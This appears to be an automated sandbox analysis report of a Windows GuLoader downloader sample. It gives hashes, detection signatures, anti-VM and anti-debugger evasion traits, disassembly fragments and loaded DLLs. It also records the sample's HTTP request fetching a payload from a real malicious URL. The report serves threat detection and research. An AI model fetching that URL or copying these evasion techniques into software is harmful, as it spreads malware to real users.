

Windows Analysis Report
450707124374000811.exe

Overview

General Information

Sample name: 450707124374000811.exe
Analysis ID: 1538185
MD5: 22aeab62009aaa9073b3159d7da1195e
SHA1: 602dd47b6910a522be90fc47d10d5c26a836a01a
SHA256: 1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
Tags: exe, user-Racco42

Detection

GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 450707124374000811.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
    • 450707124374000811.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\450707124374000811.exe" MD5: 22AEAB62009AAA9073B3159D7DA1195E)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000000.00000002.2468313249.0000000002BF8000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
    No Sigma rule has matched
    No Suricata rule has matched



    AV Detection

    Source: 450707124374000811.exe Avira: detected
    Source: 450707124374000811.exe ReversingLabs: Detection: 44%
    Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
    Source: 450707124374000811.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown HTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49846 version: TLS 1.2
    Source: 450707124374000811.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP source: 450707124374000811.exe, 00000004.00000003.2862772211.000000003559E000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2864836378.0000000035746000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: 450707124374000811.exe, 450707124374000811.exe, 00000004.00000003.2862772211.000000003559E000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2864836378.0000000035746000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_00402862 FindFirstFileW,0_2_00402862
    Source: Joe Sandbox View IP Address: 193.107.36.30 193.107.36.30
    Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic HTTP traffic detected:
        GET /GZgWeuQ77.bin HTTP/1.1
        User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: alfacen.com
        Cache-Control: no-cache
    Source: global traffic DNS traffic detected: DNS query: alfacen.com
    Source: 450707124374000811.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005653000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863552565.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893461136.000000000565C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863258714.000000000565B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863513431.0000000005653000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863552565.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893461136.000000000565C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2914434023.0000000034D30000.00000004.00001000.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863258714.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893349281.000000000562B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bin
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bine
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.bine/Q
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alfacen.com/GZgWeuQ77.binf
    Source: 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknown HTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49846 version: TLS 1.2
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405425
    Source: C:\Users\user\Desktop\450707124374000811.exe Process Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359635C0 NtCreateMutant,LdrInitializeThunk,4_2_359635C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35962DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_35962DF0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35963090 NtSetValueKey,4_2_35963090
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35963010 NtOpenDirectoryObject,4_2_35963010
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00404C620_2_00404C62
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_00406ADD0_2_00406ADD
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 0_2_004072B40_2_004072B4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CD5B04_2_359CD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F95C34_2_359F95C3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E75714_2_359E7571
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF43F4_2_359EF43F
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359214604_2_35921460
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF7B04_2_359EF7B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E16CC4_2_359E16CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359756304_2_35975630
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3593B1B04_2_3593B1B0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591F1724_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359FB16B4_2_359FB16B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3596516C4_2_3596516C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF0CC4_2_359DF0CC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C04_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E70E94_2_359E70E9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359EF0E04_2_359EF0E0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597739A4_2_3597739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E132D4_2_359E132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D34C4_2_3591D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A04_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C04_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594D2F04_2_3594D2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: String function: 3591B970 appears 96 times
    Source: 450707124374000811.exeStatic PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 450707124374000811.exe, 00000004.00000002.2914801350.0000000035BC1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.2862772211.00000000356C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: 450707124374000811.exe, 00000004.00000003.2864836378.0000000035873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 450707124374000811.exe
    Source: classification engine Classification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046E6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_004020FE CoCreateInstance,0_2_004020FE
    Source: C:\Users\user\Desktop\450707124374000811.exe File created: C:\Users\user\AppData\Roaming\pechay
    Source: C:\Users\user\Desktop\450707124374000811.exe File created: C:\Users\user\AppData\Local\Temp\nsfA7DB.tmp
    Source: 450707124374000811.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\450707124374000811.exe File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\450707124374000811.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\450707124374000811.exe File read: C:\Users\user\Desktop\450707124374000811.exe
    Source: unknown Process created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exe Process created: C:\Users\user\Desktop\450707124374000811.exe "C:\Users\user\Desktop\450707124374000811.exe"
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: version.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wkscli.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: fwpuclnt.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: schannel.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: mskeyprotect.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ntasn1.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: dpapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ncrypt.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Section loaded: ncryptsslp.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

    Data Obfuscation

    Source: Yara match File source: 00000000.00000002.2468313249.0000000002BF8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_358F1368 push eax; iretd 4_2_358F1369
    Source: C:\Users\user\Desktop\450707124374000811.exe File created: C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\450707124374000811.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Saddukisk233\centerleder.ini count: 45722
    Source: C:\Users\user\Desktop\450707124374000811.exe API/Special instruction interceptor: Address: 31291AD
    Source: C:\Users\user\Desktop\450707124374000811.exe API/Special instruction interceptor: Address: 1D091AD
    Source: C:\Users\user\Desktop\450707124374000811.exe RDTSC instruction interceptor: First address: 30EC9BB second address: 30EC9BB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8700C58778h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, dl 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exe RDTSC instruction interceptor: First address: 1CCC9BB second address: 1CCC9BB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8700D7BE88h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, dl 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3599D1C0 rdtsc 4_2_3599D1C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll
    Source: C:\Users\user\Desktop\450707124374000811.exe API coverage: 0.4 %
    Source: C:\Users\user\Desktop\450707124374000811.exe TID: 796 Thread sleep time: -30000s >= -30000s
    Source: 450707124374000811.exe, 00000004.00000003.2863443830.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863224736.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893481986.000000000566C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
    Source: 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863443830.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863224736.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893481986.000000000566C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\450707124374000811.exe API call chain: ExitProcess graph end node graph_0-4600
    Source: C:\Users\user\Desktop\450707124374000811.exe API call chain: ExitProcess graph end node graph_0-4604
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AB594 mov eax, dword ptr fs:[00000030h]4_2_359AB594
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359AB594 mov eax, dword ptr fs:[00000030h]4_2_359AB594
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591758F mov eax, dword ptr fs:[00000030h]4_2_3591758F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591758F mov eax, dword ptr fs:[00000030h] 4_2_3591758F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591758F mov eax, dword ptr fs:[00000030h] 4_2_3591758F
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h] 4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h] 4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h] 4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359B35BA mov eax, dword ptr fs:[00000030h] 4_2_359B35BA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359DF5BE mov eax, dword ptr fs:[00000030h] 4_2_359DF5BE
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594F5B0 mov eax, dword ptr fs:[00000030h] 4_2_3594F5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F35B6 mov eax, dword ptr fs:[00000030h] 4_2_359F35B6
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359BD5B0 mov eax, dword ptr fs:[00000030h] 4_2_359BD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359BD5B0 mov eax, dword ptr fs:[00000030h] 4_2_359BD5B0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h] 4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h] 4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h] 4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h] 4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359415A9 mov eax, dword ptr fs:[00000030h] 4_2_359415A9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F35D7 mov eax, dword ptr fs:[00000030h] 4_2_359F35D7
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F35D7 mov eax, dword ptr fs:[00000030h] 4_2_359F35D7
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F35D7 mov eax, dword ptr fs:[00000030h] 4_2_359F35D7
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3599D5D0 mov eax, dword ptr fs:[00000030h] 4_2_3599D5D0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3599D5D0 mov ecx, dword ptr fs:[00000030h] 4_2_3599D5D0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359495DA mov eax, dword ptr fs:[00000030h] 4_2_359495DA
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359555C0 mov eax, dword ptr fs:[00000030h] 4_2_359555C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F55C9 mov eax, dword ptr fs:[00000030h] 4_2_359F55C9
